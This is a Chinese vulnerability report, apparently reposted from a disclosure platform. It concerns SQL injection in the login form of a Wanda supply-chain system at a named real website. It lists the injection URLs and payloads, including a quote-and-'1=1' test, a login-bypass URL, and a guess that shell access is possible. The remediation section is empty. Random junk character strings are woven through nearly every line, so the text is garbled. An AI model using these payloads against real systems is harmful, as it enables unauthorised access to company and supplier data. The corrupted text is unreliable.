简要描述:万达某分站sql注入。敏感信息泄露。# l# q1 p b% [5 b% `
详细说明:" G# I- O, K, g# N
万达scm系统登陆框sql注入。0 z' e" e' s1 U5 ?/ x
% z! d% }$ o4 X7 I" d+ n9 v6 M3 ^+ Phttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
6 \/ [. \5 Z5 A+ L; ~$ g" V* X. S5 H0 G8 C
: K7 A: a; ?& |# h500错误。% `0 Y6 a: z9 N; D+ Y n7 Z
6 u l* g# P- F/ Z$ d5 I- Z用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
8 m3 e0 M: ^8 X" x8 J8 j# {$ Chttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png3 h1 o$ n6 t" R& g: t
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
4 O9 m! f0 n% b0 n( r: I, [经过分析,登陆验证的过程应该是:
! o: f, g: a6 n+ o# b# N+ S; v/ v2 V1 H d
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。6 G9 B3 x! I {) o
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
9 y4 d# T( d, |1 @4 s; e/ M+ B% ^$ f
+ u0 U, H* P% \ t! U6 Z8 a& l- toracle数据库,存在注入点。@大连万达,你怎么看?, ^+ S# {; [/ z9 ^4 q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png; _1 f" Z, S# h5 m/ D
; Y1 C# g6 j0 j4 C2 e系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。- f: k$ p# I# Q" a+ R( F/ v
漏洞证明:
! _, v. q2 U$ i( F7 ]万达scm系统登陆框sql注入。
+ c3 i. A1 I0 F( z9 o" V" X1 k
* @3 n2 C( k) {4 ghttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
1 k. a4 F/ _ n4 V& Y; ?' q& N3 W( d( J8 i: t4 x
f% ~8 n9 @! w0 ], t500错误。
# p2 C$ j9 K$ B$ N5 s+ c/ Y& `& H* A) h1 J3 X
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。3 \; e6 z$ q/ q
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png, E/ \+ |3 i' d
6 d/ g- n5 }& }0 U& v1 U* E# O9 j) S
(截图有一点问题) f* ~- J' @" I" J% A6 Y
( {* Q' }& O- o: o- L8 g9 m# A怎么饶都饶不过去;经过分析,登陆验证的过程应该是:& \/ v1 O4 U* Y* P; i2 z7 a- ]
6 y2 y- N( ~$ Q& R) C取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
# |* L8 ^" Q% n5 l: _" r+ `. S0 V3 z9 P) Z* x
绕过:
7 ~4 e, V: W) A, bhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=11 Q! s: h4 \$ Q5 ]& }' y1 U/ f
) a1 G3 z0 Z5 m( K' r, W$ A1 g
( C! X, I& j3 C5 O+ V6 Ooracle数据库,存在注入点。@大连万达,你怎么看?
, Q6 B/ Y. x% n' r系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。* ?3 d! z4 s# L. S3 h4 B/ h
+ V; v; k# [" y1 N Z u修复方案:$ F* {& C5 n/ K9 T! J3 d+ X
。。。
( g5 A$ R2 X9 N
) } ]) ]8 g! B$ z. U1 |% }0 s
$ G" F( b; j% I5 u厂商已经确认, N9 s+ F9 S% m! w% n& k( \
( Z' o) K; K1 K3 h; T
[/td][/tr]
' x1 H# m3 Q k2 ^$ z0 E: e/ I0 `[/table]( b/ r5 F& \: M6 x8 {3 v9 L2 p+ R+ p
4 j$ S3 [% h7 `3 Z/ ?- F. C
* X5 S9 G/ |, f9 K+ s9 s |